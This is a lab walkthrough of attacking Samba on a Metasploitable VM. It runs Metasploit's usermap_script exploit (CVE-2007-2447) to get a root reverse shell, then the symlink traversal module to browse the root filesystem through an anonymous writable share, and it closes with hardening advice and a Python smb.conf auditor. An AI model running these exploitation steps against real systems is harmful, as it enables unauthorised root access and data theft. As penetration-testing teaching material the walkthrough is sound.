Let's start with an nmap scan of the remote host, limited to the two SMB ports and with version detection and the default scripts enabled.
root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-07 12:08 MST
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:AA:7E:5A (Oracle VirtualBox virtual NIC)

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-07T14:08:36-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
root@ubuntu:~#
As you can see, both ports are open and the host is running Samba 3.0.20-Debian; note the exact version, because it decides which of the exploits below will work. Our next task is to ask the Samba server for its share list and try to connect to one of the shares anonymously.
sam@ubuntu:~$ smbclient -L //192.168.56.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP
sam@ubuntu:~$
We see two disk shares of interest, tmp and opt (print$ only holds printer drivers, and IPC$ and ADMIN$ are the usual administrative shares). opt is password protected and cannot be accessed anonymously, but tmp accepts an anonymous login without any problem.
sam@ubuntu:~$ smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  7 12:03:16 2020
  ..                                 DR        0  Sun May 20 13:36:12 2012
  .ICE-unix                          DH        0  Fri Feb  7 11:56:45 2020
  .X11-unix                          DH        0  Fri Feb  7 11:57:08 2020
  .X0-lock                           HR       11  Fri Feb  7 11:57:08 2020
  4529.jsvc_up                        R        0  Fri Feb  7 11:57:21 2020

                7282168 blocks of size 1024. 5436104 blocks available
smb: \>
There is nothing interesting in the tmp share, just the temporary files the operating system has left there. What matters is that the share is writable by an anonymous user, which we will come back to later. Let's move on and exploit the Samba service itself.
Samba usermap_script
Metasploit gives us a lot of options when attacking a Samba service. The module we will use is exploit/multi/samba/usermap_script, which abuses the non-default "username map script" option in smb.conf: Samba 3.0.20 through 3.0.25rc3 passes the client-supplied username to that script through /bin/sh without sanitizing it, so a username containing shell metacharacters executes arbitrary commands as the user smbd runs as, which is root (CVE-2007-2447). No credentials are needed, because the injection happens during authentication. If all goes well we should get back a shell.
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo edd61L0j1w8uZUtm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "edd61L0j1w8uZUtm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:52751) at 2020-02-07 12:01:02 -0700

id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/#
As you can see, we got back a root shell with this exploit: the injected command runs inside smbd, which runs as root. The session is a bare command shell, so the last line upgrades it to a proper pty with python before we do anything else.
Samba Symlink Traversal
Our next task is to exploit the symlink traversal vulnerability (CVE-2010-0926). Samba releases of this era ship with "wide links = yes", which means a symlink inside a share may point anywhere on the server's filesystem, and with the UNIX extensions enabled an SMB client can create symlinks itself. Combine those with a share that anonymous users can write to, like tmp above, and we can plant a link to / and browse the whole disk through the share, no exploit code required. Let's fire up Metasploit and give it a go.
msf5 exploit(multi/samba/usermap_script) > use auxiliary/admin/smb/samba_symlink_traversal
msf5 auxiliary(admin/smb/samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.56.101

[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: SMBSHARE.
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.56.101

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.56.101:445 - Now access the following share to browse the root filesystem:
[*] 192.168.56.101:445 - 	\\192.168.56.101\tmp\rootfs\

[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/samba_symlink_traversal) >
Now we reconnect to the tmp share and check whether the 'rootfs' link the module created is there.
root@ubuntu:~# smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  7 12:16:32 2020
  ..                                 DR        0  Sun May 20 13:36:12 2012
  .ICE-unix                          DH        0  Fri Feb  7 11:56:45 2020
  .X11-unix                          DH        0  Fri Feb  7 11:57:08 2020
  .X0-lock                           HR       11  Fri Feb  7 11:57:08 2020
  rootfs                             DR        0  Sun May 20 13:36:12 2012
  4529.jsvc_up                        R        0  Fri Feb  7 11:57:21 2020

                7282168 blocks of size 1024. 5436096 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 13:36:12 2012
  ..                                 DR        0  Sun May 20 13:36:12 2012
  initrd                             DR        0  Tue Mar 16 17:57:40 2010
  media                              DR        0  Tue Mar 16 17:55:52 2010
  bin                                DR        0  Sun May 13 22:35:33 2012
  lost+found                         DR        0  Tue Mar 16 17:55:15 2010
  mnt                                DR        0  Wed Apr 28 15:16:56 2010
  sbin                               DR        0  Sun May 13 20:54:53 2012
  initrd.img                          R  7929183  Sun May 13 22:35:56 2012
  home                               DR        0  Fri Apr 16 01:16:02 2010
  lib                                DR        0  Sun May 13 22:35:22 2012
  usr                                DR        0  Tue Apr 27 23:06:37 2010
  proc                               DR        0  Fri Feb  7 11:56:30 2020
  root                               DR        0  Fri Feb  7 11:57:07 2020
  sys                                DR        0  Fri Feb  7 11:56:31 2020
  boot                               DR        0  Sun May 13 22:36:28 2012
  nohup.out                           R     9426  Fri Feb  7 11:57:08 2020
  etc                                DR        0  Fri Feb  7 11:57:02 2020
  dev                                DR        0  Fri Feb  7 11:56:45 2020
  vmlinuz                             R  1987288  Thu Apr 10 11:55:41 2008
  opt                                DR        0  Tue Mar 16 17:57:39 2010
  var                                DR        0  Wed Mar 17 09:08:23 2010
  cdrom                              DR        0  Tue Mar 16 17:55:51 2010
  tmp                                 D        0  Fri Feb  7 12:16:32 2020
  srv                                DR        0  Tue Mar 16 17:57:38 2010

                7282168 blocks of size 1024. 5436096 blocks available
smb: \rootfs\>
As you can see, the rootfs entry gives us the contents of the root filesystem to browse through, with the access rights of the share (here the anonymous guest account), so readable files such as /etc/passwd are available without any shell. The two weaknesses are independent: the first needed the "username map script" option on a Samba 3.0.20 to 3.0.25rc3 server, the second only needed an anonymous writable share together with the default "wide links" setting. On the defensive side, the usermap_script bug was fixed in Samba 3.0.25, "wide links = no" became the default with Samba 3.4.6 (and the server now forces it off whenever "unix extensions = yes"), and guest-writable shares should simply not be exported.
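Both attacks above come down to a handful of smb.conf settings, so it is useful to be able to check a config file for them before (or instead of) pointing Metasploit at the box. The following auditor is an added example, not code from the original post or from the Samba or Metasploit projects. The two configs embedded in it are constructed for illustration and are not copied from the Metasploitable VM; the option names ("username map script", "wide links", "guest ok"/"public", "read only"/"writable") are real smb.conf options, and the version ranges in the findings are the ones stated in the text above.

```python
import configparser

# Constructed sample configs for illustration; neither is copied from the VM.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = metasploitable server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh
   ; 'wide links' is not set, so Samba 3.0.x falls back to its default of yes

[print$]
   path = /var/lib/samba/printers
   read only = yes
   guest ok = no

[tmp]
   comment = oh noes!
   path = /tmp
   public = yes
   writable = yes

[opt]
   path = /opt
   valid users = msfadmin
   read only = no
"""

HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   wide links = no
   unix extensions = yes

[tmp]
   path = /tmp
   guest ok = no
   read only = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def _is_true(value):
    """Samba booleans: yes/true/1 are true, anything else is false."""
    return value.strip().lower() in TRUE_VALUES


def load_smb_conf(text):
    """Parse smb.conf with configparser, which handles the INI dialect well
    enough for an audit. Samba ignores case and internal whitespace in option
    names, so the same normalisation is applied. 'include =' is not followed."""
    parser = configparser.ConfigParser(
        strict=False, interpolation=None, inline_comment_prefixes=(";", "#")
    )
    parser.optionxform = lambda name: " ".join(name.lower().split())
    parser.read_string(text)
    return parser


def share_is_anon_writable(parser, share):
    """True if guest clients may write to the share. 'public' is a synonym of
    'guest ok'; 'writable'/'writeable' invert 'read only', whose default is yes."""
    sec = parser[share]
    guest = _is_true(sec.get("guest ok", sec.get("public", "no")))
    read_only = sec.get("read only")
    if read_only is not None:
        writable = not _is_true(read_only)
    else:
        writable = _is_true(sec.get("writable", sec.get("writeable", "no")))
    return guest and writable


def audit(text):
    """Return findings that map to the two attacks shown in this post."""
    parser = load_smb_conf(text)
    findings = []
    g = parser["global"] if parser.has_section("global") else {}

    # usermap_script: the mapped username reaches /bin/sh on affected versions.
    if g.get("username map script"):
        findings.append("global: 'username map script' is set; on Samba 3.0.20-3.0.25rc3 "
                        "the client-supplied username reaches /bin/sh unsanitized")

    # symlink traversal: symlinks are only confined to the share when wide links is off.
    wide = g.get("wide links")
    if wide is None or _is_true(wide):
        state = "unset (3.0.x defaults to yes)" if wide is None else "yes"
        findings.append(f"global: 'wide links' is {state}; a symlink in a share can point outside it")

    for share in parser.sections():
        if share != "global" and share_is_anon_writable(parser, share):
            findings.append(f"[{share}]: guest-accessible and writable; an anonymous client "
                            "can plant a symlink to / and browse the whole filesystem")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label} ==")
        for finding in audit(conf) or ["no findings"]:
            print(" -", finding)
```

Run against the weak config it reports the map script, the unset wide links and the guest-writable tmp share, and says nothing about opt or print$ (one is not guest-accessible, the other is read only); the hardened config produces no findings. Note that the "wide links" check on its own is a risk indicator, not proof: the traversal additionally needs a share the client can write to, which is why the module insisted on SMBSHARE above.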